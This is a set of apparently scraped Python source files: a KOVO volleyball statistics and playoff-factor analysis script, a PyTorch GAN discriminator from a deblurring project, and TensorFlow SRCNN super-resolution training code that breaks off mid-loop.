Female_dig_efficiency = ((kovo_Fresult_table[('디그', '성공')]-kovo_Fresult_table[('디그', '실패')]-kovo_Fresult_table[('디그', '범실')])/kovo_Fresult_table[('디그', '시도')])*100
Male_set_efficiency = ((kovo_Mresult_table[('세트', '성공')]-kovo_Mresult_table[('세트', '범실')])/kovo_Mresult_table[('세트', '시도')])*100
Female_set_efficiency = ((kovo_Fresult_table[('세트', '성공')]-kovo_Fresult_table[('세트', '범실')])/kovo_Fresult_table[('세트', '시도')])*100
Male_receive_efficiency = ((kovo_Mresult_table[('리시브', '정확')]-kovo_Mresult_table[('리시브', '범실')])/kovo_Mresult_table[('리시브', '시도')])*100
Female_receive_efficiency = ((kovo_Fresult_table[('리시브', '정확')]-kovo_Fresult_table[('리시브', '범실')])/kovo_Fresult_table[('리시브', '시도')])*100
import Analysis_practice as As
# 임시로 플레이오프 진출한 팀에 대한 내용을 추가했다.
Male_play_off = []
Female_play_off = []
# 1은 진출했다는 의미 / 0은 진출하지 못하였다는 의미
for index in range(len(kovo_Mresult_table)) :
if index<3:
Male_play_off.append(1)
else:
# 11년도 시즌 이후부터는 4등과 3등의 승점이 3점 이내일 경우 플레이오프에 진출하므로 조건을 추가해줘야 한다.
if year>10 and index==3 and kovo_Mresult_table.iloc[2]["승점"]-kovo_Mresult_table.iloc[3]["승점"]<=3:
Male_play_off.append(1)
else:
Male_play_off.append(0)
for index in range(len(kovo_Fresult_table)) :
if index<3:
Female_play_off.append(1)
else:
Female_play_off.append(0)
# 공격 효율이라는 항목을 추가하므로 공격파트에 추가를 해줘야 보기 편하기에 삽입하였다.
kovo_Mresult_table.insert(loc=16,column="공격_효율",value=Male_attack_efficiency)
kovo_Fresult_table.insert(loc=16,column="공격_효율",value=Female_attack_efficiency)
kovo_Mresult_table.insert(loc=22,column="오픈공격_효율",value=Male_open_attack_efficiency)
kovo_Fresult_table.insert(loc=22,column="오픈공격_효율",value=Female_open_attack_efficiency)
kovo_Mresult_table.insert(loc=28,column="시간차공격_효율",value=Male_time_attack_efficiency)
kovo_Fresult_table.insert(loc=28,column="시간차공격_효율",value=Female_time_attack_efficiency)
# NaN값이 많아서 추가하지 않았다.
# kovo_Mresult_table.insert(loc=34,column="이동공격_효율",value=Male_moving_attack_efficiency)
# kovo_Fresult_table.insert(loc=34,column="이동공격_효율",value=Female_moving_attack_efficiency)
kovo_Mresult_table.insert(loc=39,column="후위공격_효율",value=Male_back_attack_efficiency)
kovo_Fresult_table.insert(loc=39,column="후위공격_효율",value=Female_back_attack_efficiency)
kovo_Mresult_table.insert(loc=45,column="속공_효율",value=Male_quick_attack_efficiency)
kovo_Fresult_table.insert(loc=45,column="속공_효율",value=Female_quick_attack_efficiency)
kovo_Mresult_table.insert(loc=51,column="퀵오픈_효율",value=Male_quick_open_efficiency)
kovo_Fresult_table.insert(loc=51,column="퀵오픈_효율",value=Female_quick_open_efficiency)
kovo_Mresult_table.insert(loc=56,column="서브_효율",value=Male_serve_efficiency)
kovo_Fresult_table.insert(loc=56,column="서브_효율",value=Female_serve_efficiency)
kovo_Mresult_table.insert(loc=64,column="블로킹_효율",value=Male_blocking_efficiency)
kovo_Fresult_table.insert(loc=64,column="블로킹_효율",value=Female_blocking_efficiency)
kovo_Mresult_table.insert(loc=70,column="디그_효율",value=Male_dig_efficiency)
kovo_Fresult_table.insert(loc=70,column="디그_효율",value=Female_dig_efficiency)
kovo_Mresult_table.insert(loc=75,column="세트_효율",value=Male_set_efficiency)
kovo_Fresult_table.insert(loc=75,column="세트_효율",value=Female_set_efficiency)
kovo_Mresult_table.insert(loc=80,column="리시브_효율",value=Male_receive_efficiency)
kovo_Fresult_table.insert(loc=80,column="리시브_효율",value=Female_receive_efficiency)
kovo_Mresult_table["최다연승"] = Male_win_score
kovo_Mresult_table["최다연패"] = Male_lose_score
kovo_Fresult_table["최다연승"] = Female_win_score
kovo_Fresult_table["최다연패"] = Female_lose_score
kovo_Mresult_table["플레이오프진출"] = Male_play_off
kovo_Fresult_table["플레이오프진출"] = Female_play_off
if year<=10:
del kovo_Mresult_table["승률"]
del kovo_Fresult_table["승률"]
else:
del kovo_Mresult_table["승점"]
del kovo_Fresult_table["승점"]
# 해당 데이터에서 낮으면 긍정적인 값들을 음수값으로 변경해준다.
convert_negative(kovo_Mresult_table,'공격차단')
convert_negative(kovo_Fresult_table,'공격차단')
convert_negative(kovo_Mresult_table,'범실')
convert_negative(kovo_Fresult_table,'범실')
convert_negative(kovo_Mresult_table,'실패')
convert_negative(kovo_Fresult_table,'실패')
convert_negative(kovo_Mresult_table,'최다연패')
convert_negative(kovo_Fresult_table,'최다연패')
Mdata.append(kovo_Mresult_table)
Fdata.append(kovo_Fresult_table)
# Male_data와 Female_data로 합친다.
Male_data = pd.concat([Mdata[0],Mdata[1],Mdata[2],Mdata[3],Mdata[4],Mdata[5],Mdata[6],Mdata[7],Mdata[8],Mdata[9]])
Female_data = pd.concat([Fdata[0],Fdata[1],Fdata[2],Fdata[3],Fdata[4],Fdata[5],Fdata[6],Fdata[7],Fdata[8],Fdata[9]])
# 10년치의 데이터를 합친(공격효율,최다연승,최다연패,플레이오프진출)
Male_data.to_pickle("Total_M_Data")
Female_data.to_pickle("Total_F_Data")
# 플레이오프와 관계없는 데이터를 제거한다
def delete_feature(table,name):
del table[name]
delete_feature(Male_data,'경기수')
delete_feature(Female_data,'경기수')
delete_feature(Male_data,'순위')
delete_feature(Female_data,'순위')
delete_feature(Male_data,'승')
delete_feature(Female_data,'승')
delete_feature(Male_data,'패')
delete_feature(Female_data,'패')
delete_feature(Male_data,'세트득실률')
delete_feature(Female_data,'세트득실률')
delete_feature(Male_data,'점수득실률')
delete_feature(Female_data,'점수득실률')
def change_name(table):
for loop in range(0,len(table.columns)):
# 튜플로 된 이름들은 길이가 2이므로
if len(table.columns[loop])==2:
# 득점,벌칙,범실은 2개가 겹치므로 하나만 넣어준다.
if (table.columns[loop][-1]=='득점' and table.columns[loop][-2]=='득점') or (table.columns[loop][-1]=='벌칙' and table.columns[loop][-2]=='벌칙') or (table.columns[loop][-1]=='범실' and table.columns[loop][-2]=='범실'):
table.rename(columns={table.columns[loop]:table.columns[loop][-2]},inplace='True')
else:
table.rename(columns={table.columns[loop]:table.columns[loop][-2]+'_'+table.columns[loop][-1]},inplace='True')
change_name(Male_data)
change_name(Female_data)
delete_feature(Male_data,'벌칙')
delete_feature(Female_data,'벌칙')
# 임시로 엑셀파일을 만들어 둔다
#Male_data.to_excel('male.xlsx')
#Female_data.to_excel('female.xlsx')
Mplayoff = Male_data['플레이오프진출']
del Male_data['플레이오프진출']
Fplayoff = Female_data['플레이오프진출']
del Female_data['플레이오프진출']
# 전체 데이터를 정규화 한다.(전체 데이터를 다 받고 정규화)
Male_data_norm = data_norm(Male_data)
Female_data_norm = data_norm(Female_data)
# 주요요인 추출
# 전체경기요인
#Extract_M_Data = Male_data_norm[['득점_공격', '득점_블로킹', '득점_서브', '득점', '공격_시도', '공격_성공', '공격_공격차단', '공격_범실',
# '공격_성공률','공격_효율','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실',
# '오픈공격_성공률','오픈공격_효율','시간차공격_시도', '시간차공격_성공', '시간차공격_공격차단', '시간차공격_범실',
# '시간차공격_성공률','시간차공격_효율','이동공격_시도', '이동공격_성공', '이동공격_공격차단', '이동공격_범실', '이동공격_성공률',
# '후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실', '후위공격_성공률','후위공격_효율', '속공_시도',
# '속공_성공', '속공_공격차단', '속공_범실', '속공_성공률','속공_효율', '퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단',
# '퀵오픈_범실', '퀵오픈_성공률','퀵오픈_효율', '서브_시도', '서브_성공', '서브_범실', '서브_세트당평균','서브_효율', '블로킹_시도',
# '블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트', '블로킹_세트당평균','블로킹_효율',
# '디그_시도', '디그_성공', '디그_실패', '디그_범실', '디그_세트당평균','디그_효율', '세트_시도', '세트_성공',
# '세트_범실', '세트_세트당평균','세트_효율', '리시브_시도', '리시브_정확', '리시브_범실', '리시브_세트당평균','리시브_효율', '범실']]
#Extract_F_Data = Female_data_norm[['득점_공격', '득점_블로킹', '득점_서브', '득점', '공격_시도', '공격_성공', '공격_공격차단', '공격_범실',
# '공격_성공률','공격_효율','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실',
# '오픈공격_성공률','오픈공격_효율','시간차공격_시도', '시간차공격_성공', '시간차공격_공격차단', '시간차공격_범실',
# '시간차공격_성공률','시간차공격_효율','이동공격_시도', '이동공격_성공', '이동공격_공격차단', '이동공격_범실', '이동공격_성공률',
# '후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실', '후위공격_성공률','후위공격_효율', '속공_시도',
# '속공_성공', '속공_공격차단', '속공_범실', '속공_성공률','속공_효율', '퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단',
# '퀵오픈_범실', '퀵오픈_성공률','퀵오픈_효율', '서브_시도', '서브_성공', '서브_범실', '서브_세트당평균','서브_효율', '블로킹_시도',
# '블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트', '블로킹_세트당평균','블로킹_효율',
# '디그_시도', '디그_성공', '디그_실패', '디그_범실', '디그_세트당평균','디그_효율', '세트_시도', '세트_성공',
# '세트_범실', '세트_세트당평균','세트_효율', '리시브_시도', '리시브_정확', '리시브_범실', '리시브_세트당평균','리시브_효율', '범실']]
# 공격파트
#Extract_M_Data = Male_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률','공격_효율']]
#Extract_F_Data = Female_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률','공격_효율']]
# 오픈공격파트
#Extract_M_Data = Male_data_norm[['오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률', '오픈공격_효율']]
#Extract_F_Data = Female_data_norm[['오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률','오픈공격_효율']]
# 시간차공격
#Extract_M_Data = Male_data_norm[['시간차공격_시도', '시간차공격_성공', '시간차공격_공격차단', '시간차공격_범실','시간차공격_성공률','시간차공격_효율']]
#Extract_F_Data = Female_data_norm[['시간차공격_시도', '시간차공격_성공', '시간차공격_공격차단', '시간차공격_범실','시간차공격_성공률','시간차공격_효율']]
# 이동공격
#Extract_M_Data = Male_data_norm[['이동공격_시도', '이동공격_성공', '이동공격_공격차단', '이동공격_범실']]
#Extract_F_Data = Female_data_norm[['이동공격_시도', '이동공격_성공', '이동공격_공격차단', '이동공격_범실']]
# 후위공격
#Extract_M_Data = Male_data_norm[['후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실','후위공격_성공률','후위공격_효율']]
#Extract_F_Data = Female_data_norm[['후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실','후위공격_성공률','후위공격_효율']]
# 속공
#Extract_M_Data = Male_data_norm[['속공_시도','속공_성공', '속공_공격차단', '속공_범실','속공_성공률','속공_효율']]
#Extract_F_Data = Female_data_norm[['속공_시도','속공_성공', '속공_공격차단', '속공_범실','속공_성공률','속공_효율']]
# 퀵오픈
#Extract_M_Data = Male_data_norm[['퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단','퀵오픈_범실','퀵오픈_성공률','퀵오픈_효율']]
#Extract_F_Data = Female_data_norm[['퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단','퀵오픈_범실','퀵오픈_성공률','퀵오픈_효율']]
# 서브
#Extract_M_Data = Male_data_norm[['서브_시도', '서브_성공', '서브_범실','서브_효율']]
#Extract_F_Data = Female_data_norm[['서브_시도', '서브_성공', '서브_범실','서브_효율']]
# 블로킹
#Extract_M_Data = Male_data_norm[['블로킹_시도','블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트','블로킹_효율']]
#Extract_F_Data = Female_data_norm[['블로킹_시도','블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트','블로킹_효율']]
# 디그
#Extract_M_Data = Male_data_norm[['디그_시도', '디그_성공', '디그_실패', '디그_범실','디그_효율']]
#Extract_F_Data = Female_data_norm[['디그_시도', '디그_성공', '디그_실패', '디그_범실','디그_효율']]
# 세트
#Extract_M_Data = Male_data_norm[['세트_시도', '세트_성공','세트_범실','세트_효율']]
#Extract_F_Data = Female_data_norm[['세트_시도', '세트_성공','세트_범실','세트_효율']]
# 리시브
#Extract_M_Data = Male_data_norm[['리시브_시도', '리시브_정확', '리시브_범실','리시브_효율']]
#Extract_F_Data = Female_data_norm[['리시브_시도', '리시브_정확', '리시브_범실','리시브_효율']]
# 공격 + 블로킹 + 서브 + 세트 +리시브 + 최다연승 + 최다연패
#Extract_M_Data = Male_data_norm[['공격_시도','공격_범실','공격_공격차단','공격_성공','공격_효율','블로킹_시도','블로킹_성공','블로킹_실패','블로킹_범실','서브_시도','서브_범실','서브_성공','세트_시도','세트_범실','세트_성공','리시브_시도','리시브_범실','리시브_정확','최다연패','최다연승']]
#Extract_F_Data = Female_data_norm[['공격_시도','공격_범실','공격_공격차단','공격_성공','공격_효율','블로킹_시도','블로킹_성공','블로킹_실패','블로킹_범실','서브_시도','서브_범실','서브_성공','세트_시도','세트_범실','세트_성공','리시브_시도','리시브_범실','리시브_정확','최다연패','최다연승']]
# 상위 3개 요인 남자(후위공격/공격/오픈공격 : 12개) 여자(오픈공격/공격/리시브 : 11개)
#Extract_M_Data = Male_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실']]
#Extract_F_Data = Female_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','리시브_시도', '리시브_정확', '리시브_범실']]
# 공격 + 블로킹 + 서브 + 세트 + 리시브
#Extract_M_Data = Male_data_norm[['공격_시도','공격_범실','공격_공격차단','공격_성공','블로킹_시도','블로킹_성공','블로킹_실패','블로킹_범실','서브_시도','서브_범실','서브_성공','세트_시도','세트_범실','세트_성공','리시브_시도','리시브_범실','리시브_정확']]
#Extract_F_Data = Female_data_norm[['공격_시도','공격_범실','공격_공격차단','공격_성공','블로킹_시도','블로킹_성공','블로킹_실패','블로킹_범실','서브_시도','서브_범실','서브_성공','세트_시도','세트_범실','세트_성공','리시브_시도','리시브_범실','리시브_정확']]
# 상위 5개 요인 남자(세트/오픈공격/후위공격/서브/속공) 여자(오픈공격/퀵오픈/후위공격/리시브/세트)
#Extract_M_Data = Male_data_norm[['오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률', '오픈공격_효율',
# '후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실','후위공격_성공률','후위공격_효율',
# '속공_시도','속공_성공', '속공_공격차단', '속공_범실','속공_성공률','속공_효율',
# '서브_시도', '서브_성공', '서브_범실','서브_효율',
# '세트_시도','세트_성공','세트_범실','세트_효율']]
#Extract_F_Data = Female_data_norm[['오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률', '오픈공격_효율',
# '후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실','후위공격_성공률','후위공격_효율',
# '퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단','퀵오픈_범실','퀵오픈_성공률','퀵오픈_효율',
# '세트_시도', '세트_성공','세트_범실','세트_효율',
# '리시브_시도', '리시브_정확', '리시브_범실','리시브_효율']]
# 배구 5개 요인 남자(오픈공격/블로킹/서브/리시브/세트) 여자(오픈공격/블로킹/서브/리시브.세트)
#Extract_M_Data = Male_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률', '공격_효율',
# '블로킹_시도','블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트','블로킹_효율',
# '서브_시도', '서브_성공', '서브_범실','서브_효율',
# '세트_시도','세트_성공','세트_범실','세트_효율',
# '리시브_시도', '리시브_정확', '리시브_범실','리시브_효율','최다연승','최다연패']]
#Extract_F_Data = Female_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률', '공격_효율',
# '블로킹_시도','블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트','블로킹_효율',
# '서브_시도', '서브_성공', '서브_범실','서브_효율',
# '세트_시도','세트_성공','세트_범실','세트_효율',
# '리시브_시도', '리시브_정확', '리시브_범실','리시브_효율','최다연승','최다연패']]
# 남녀부문 파트별 중요 3요인 남:오픈공격/서브/세트/최다연승/최다연패 여:오픈공격/세트/리시브/최다연승/최다연패
Extract_M_Data = Male_data_norm[['오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률', '오픈공격_효율',
# '공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률', '공격_효율',
'서브_시도', '서브_성공', '서브_범실','서브_효율',
'세트_시도','세트_성공','세트_범실','세트_효율',
'최다연승','최다연패']]
Extract_F_Data = Female_data_norm[[#'공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률', '공격_효율',
# '오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률', '오픈공격_효율',
'후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실','후위공격_성공률', '후위공격_효율',
#'퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단','퀵오픈_범실','퀵오픈_성공률','퀵오픈_효율',
'세트_시도','세트_성공','세트_범실','세트_효율',
'리시브_시도', '리시브_정확', '리시브_범실','리시브_효율',
'최다연승','최다연패']]
# 하위 4개 요인 제거
#Extract_M_Data = Male_data_norm[['득점', '공격_시도', '공격_성공', '공격_공격차단', '공격_범실',
# '공격_성공률','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실',
# '오픈공격_성공률', '후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실', '후위공격_성공률', '속공_시도',
# '속공_성공', '속공_공격차단', '속공_범실', '속공_성공률', '퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단',
# '퀵오픈_범실', '퀵오픈_성공률', '서브_시도', '서브_성공', '서브_범실', '서브_세트당평균', '블로킹_시도',
# '블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트', '블로킹_세트당평균',
# '세트_시도', '세트_성공','세트_범실', '세트_세트당평균',]]
#Extract_F_Data = Female_data_norm[['득점', '공격_시도', '공격_성공', '공격_공격차단', '공격_범실',
# '공격_성공률','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실',
# '오픈공격_성공률', '시간차공격_시도', '시간차공격_성공', '시간차공격_공격차단', '시간차공격_범실',
# '시간차공격_성공률','후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실', '후위공격_성공률', '속공_시도',
# '퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단','퀵오픈_범실', '퀵오픈_성공률', '블로킹_시도',
# '블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트', '블로킹_세트당평균',
# '세트_시도', '세트_성공','세트_범실', '세트_세트당평균', '리시브_시도', '리시브_정확', '리시브_범실', '리시브_세트당평균', '범실']]
# 데이터 가중치 확인하기
def Confirm_feature_weight(table,result):
# 데이터 전처리 과정
from sklearn.model_selection import train_test_split
X,y = table.values,result.values
# 테스트셋을 원래 데이터의 20%만 허용한다.
X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.2,random_state=0)
# 1. D차원의 데이터간의 연관성을 찾기 위해 데이터를 먼저 표준화 시킨다. (위에서 표준화를 하였으므로 생략한다.)
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train_std = sc.fit_transform(X_train)
X_test_std = sc.transform(X_test)
X_train=X_train_std
X_test=X_test_std
# X_cen = X_train - X_train.mean(axis=0)
# cov_mat = np.dot(X_cen.T,X_cen)/len(X_cen)
# 2. 특징들 상호간의 각각의 공분산을 구하기 위해 공분산 행렬을 만든다.
cov_mat = np.cov(X_train.T) # 공분산 행렬을 생성해주는 함수
# 3. 공분산 행렬을 Eigen value와 Eigen vector로 분해한다.
# 이것을 Eigendecomposition이라고 한다.
Eval,Evec = np.linalg.eig(cov_mat)
print(Eval)
# eigen value의 값이 큰 순서를 E_val_des_order에 저장한다. np.argsort(음수*데이터값)을 넣으면 크기가 큰 숫자부터 1~N까지 나온다.
E_val_des_order = np.argsort(-abs(Eval))
print(E_val_des_order)
# 4. 공분산행렬을 통해 그 두가지(Eigen value,Eigen vector)를 유도하는 것이 가능
tot = sum(Eval)
var_exp = [(i/tot) for i in sorted(Eval,reverse=True)]
# Eigen value / Eigen value의 합을 각각 구한다. 나온 각각의 값은 Eigen value의 설명 분산 비율이다.
# 즉, 어떤 Eigen value가 가장 설명력이 높은지를 비율로 나타내기 위한 것이다.
cum_var_exp = np.cumsum(var_exp) # 누적 합을 계산해주는 함수 -> 누적 백분위로 표현
# plt.figure(figsize=(18,8))
# plt.bar(table.columns[E_val_des_order],var_exp,alpha = 0.5,align='center',
# label = 'individual explained variance')
# plt.step(range(0,len(cum_var_exp)),cum_var_exp,where='mid',
# label='cumulative explained variance')
# plt.xticks(rotation=90)
# plt.ylabel('explained variance ratio')
# plt.xlabel('principal components')
# plt.legend(loc='best')
# plt.tight_layout()
# plt.show()
# # 각각의 항목에 대한 weight값을 텍스트로 나타내는것
# weight_order = table.columns[E_val_des_order]
# for loop in range(0,len(table.columns)):
# print("변수:{}\tweight:{}".format(weight_order[loop],cum_var_exp[loop]))
#print("============================남자경기요인============================")
#Confirm_feature_weight(Male_data_norm,Mplayoff)
#Confirm_feature_weight(Male_data,Mplayoff)
#Confirm_feature_weight(Extract_M_Data,Mplayoff)
#print("============================여자경기요인============================")
#Confirm_feature_weight(Female_data_norm,Fplayoff)
#Confirm_feature_weight(Female_data,Fplayoff)
#Confirm_feature_weight(Extract_M_Data,Mplayoff)
Male_data['플레이오프진출'] = Mplayoff
Female_data['플레이오프진출'] = Fplayoff
Extract_M_Data['플레이오프진출'] = Mplayoff
Extract_F_Data['플레이오프진출'] = Fplayoff
##print(Extract_M_Data.columns)
##print(Extract_F_Data.columns)
## pickle로 변환한다.
#Male_data.to_pickle("Male_data")
#Female_data.to_pickle("Female_data")
Extract_M_Data.to_pickle("Extract_M_Data")
Extract_F_Data.to_pickle("Extract_F_Data")
#Extract_M_Data.to_pickle("original_M_Data")
#Extract_F_Data.to_pickle("original_F_Data")
``` |
{
"source": "jinsuyoo/DeepDeblur-PyTorch",
"score": 3
} |
#### File: code/models/discriminator.py
```python
import torch
import torch.nn as nn
class Discriminator(nn.Module):
def __init__(self, negative_slope=0.2):
super(Discriminator, self).__init__()
self.feature_extractor = nn.Sequential(
nn.Conv2d(3, 32, kernel_size=5, stride=1, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(32, 32, kernel_size=5, stride=2, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(32, 64, kernel_size=5, stride=1, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(64, 64, kernel_size=5, stride=2, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(64, 128, kernel_size=5, stride=1, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(128, 128, kernel_size=5, stride=4, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(128, 256, kernel_size=5, stride=1, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(256, 256, kernel_size=5, stride=4, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(256, 512, kernel_size=5, stride=1, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(512, 512, kernel_size=4, stride=4, padding=0, bias=False),
nn.LeakyReLU(negative_slope, inplace=True)
)
self.fc = nn.Linear(512, 1)
def forward(self, x):
out = self.feature_extractor(x)
out = out.view(out.size(0), -1)
out = self.fc(out)
out = torch.sigmoid(out)
return out
``` |
{
"source": "jinsuyoo/SRCNN-Tensorflow",
"score": 3
} |
#### File: jinsuyoo/SRCNN-Tensorflow/main.py
```python
import tensorflow as tf
from srcnn import SRCNN
flags = tf.app.flags
flags.DEFINE_integer('epoch', 10000, 'Number of epoch')
flags.DEFINE_integer('batch_size', 128, 'The size of batch images')
flags.DEFINE_integer('image_size', 33, 'The size of sub-image')
flags.DEFINE_integer('label_size', 21, 'The size of label')
flags.DEFINE_integer('scale', 3, 'The up-scale value for training and testing')
flags.DEFINE_float('learning_rate', 1e-4, 'The learning rate of gradient descent algorithm')
flags.DEFINE_float('beta1', 0.9, 'The momentum value of gradient descent algorithm')
flags.DEFINE_string('valid_dataset', 'Set5', 'The name of training dataset')
flags.DEFINE_string('test_dataset_path', 'Test', 'The path of test dataset')
flags.DEFINE_string('test_dataset', 'Set5', 'The name of testing dataset')
flags.DEFINE_string('checkpoint_path', 'checkpoint', 'The path of checkpoint directory')
flags.DEFINE_boolean('use_pretrained', False, 'True for use pre-trained model, False for train on your own')
flags.DEFINE_string('result_dir', 'result', 'The path to save result images')
flags.DEFINE_boolean('is_training', True, 'True for training, False for testing')
FLAGS = flags.FLAGS
def main(_):
with tf.Session() as sess:
srcnn = SRCNN(sess, FLAGS)
if FLAGS.is_training == True:
srcnn.train(FLAGS)
elif FLAGS.is_training == False:
srcnn.test(FLAGS)
else:
print('[*] Please give correct [is_training] value ')
if __name__ == '__main__':
tf.app.run()
```
#### File: jinsuyoo/SRCNN-Tensorflow/srcnn.py
```python
import tensorflow as tf
import numpy as np
import os
import time
from tqdm import tqdm
from utils import *
class SRCNN(object):
def __init__(self, sess, config):
self.sess = sess
# The size of training sub-images is 33
# All the convolutional layers have no padding (fsub-f1-f2-f3+3) = (33-5-9-1+3) = 21
self.image_size = [None, None, None, 1]
self.label_size = [None, None, None, 1]
self.build_model()
def build_model(self):
self.images = tf.placeholder(tf.float32, self.image_size, name='images')
self.labels = tf.placeholder(tf.float32, self.label_size, name='labels')
self.weights = {
'w1': tf.Variable(tf.random_normal([9, 9, 1, 64], stddev=0.001), name='w1'),
'w2': tf.Variable(tf.random_normal([1, 1, 64, 32], stddev=0.001), name='w2'),
'w3': tf.Variable(tf.random_normal([5, 5, 32, 1], stddev=0.001), name='w3')
}
self.biases = {
'b1': tf.Variable(tf.zeros([64]), name='b1'),
'b2': tf.Variable(tf.zeros([32]), name='b2'),
'b3': tf.Variable(tf.zeros([1]), name='b3')
}
self.forward = self.model()
# Loss Function : Mean Square Error
self.loss = tf.reduce_mean(tf.square(tf.subtract(self.labels, self.forward)))
# Clip output
self.result = tf.clip_by_value(self.forward, clip_value_min=0., clip_value_max=1.)
self.saver = tf.train.Saver()
# Input : (33 x 33 x 1)
# Layer1 : (9 x 9 x 1 x 64)
# Layer2 : (1 x 1 x 64 x 32)
# Layer3 : (5 x 5 x 32 x 1)
# Output : (21 x 21 x 1)
def model(self):
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(self.images, self.weights['w1'], strides=[1,1,1,1], padding='VALID'), self.biases['b1']))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, self.weights['w2'], strides=[1,1,1,1], padding='VALID'), self.biases['b2']))
output = tf.nn.bias_add(tf.nn.conv2d(conv2, self.weights['w3'], strides=[1,1,1,1], padding='VALID'), self.biases['b3'])
return output
def train(self, config):
print('[*] SRCNN training will be started ! ')
if not exist_train_data():
print('[!] No train data ready .. Please generate train data first with Matlab')
return
else:
train_images, train_labels = load_train_data()
print('[*] Successfully load train data ! ')
valid_images, valid_labels = prepare_data(config, is_valid=True)
# Adam optimizer with the standard backpropagation
# The learning rate is 1e-4 for the first two layers, and 1e-5 for the last layer
# beta1 is 0.9 in paper
var_list1 = [self.weights['w1'], self.weights['w2'], self.biases['b1'], self.biases['b2']]
var_list2 = [self.weights['w3'], self.biases['b3']]
opt1 = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1)
opt2 = tf.train.AdamOptimizer(config.learning_rate * 0.1, beta1=config.beta1)
grads = tf.gradients(self.loss, var_list1 + var_list2)
grads1 = grads[:len(var_list1)]
grads2 = grads[len(var_list1):]
train_op1 = opt1.apply_gradients(zip(grads1, var_list1))
train_op2 = opt2.apply_gradients(zip(grads2, var_list2))
self.train_op = tf.group(train_op1, train_op2)
#self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)
# Initialize TensorFlow variables
init = tf.global_variables_initializer()
self.sess.run(init)
# Load checkpoint
self.load(config)
start_time = time.time()
bicubic_psnr = []
print('[*] Start training ... Please be patient !')
for i in tqdm(range(config.epoch), desc='[*] Keep going ! ', leave=True):
loss = 0
batch_idxs = len(train_images) // config.batch_size
for idx in range(batch_idxs):
batch_images = train_images[idx*config.batch_size : (idx+1)*config.batch_size]
batch_labels = train_labels[idx*config.batch_size : (idx+1)*config.batch_size]
_, err = self.sess.run([self.train_op, self.loss], feed_dict={self.images: batch_images, self.labels: batch_labels})
loss += err
valid_psnr = []
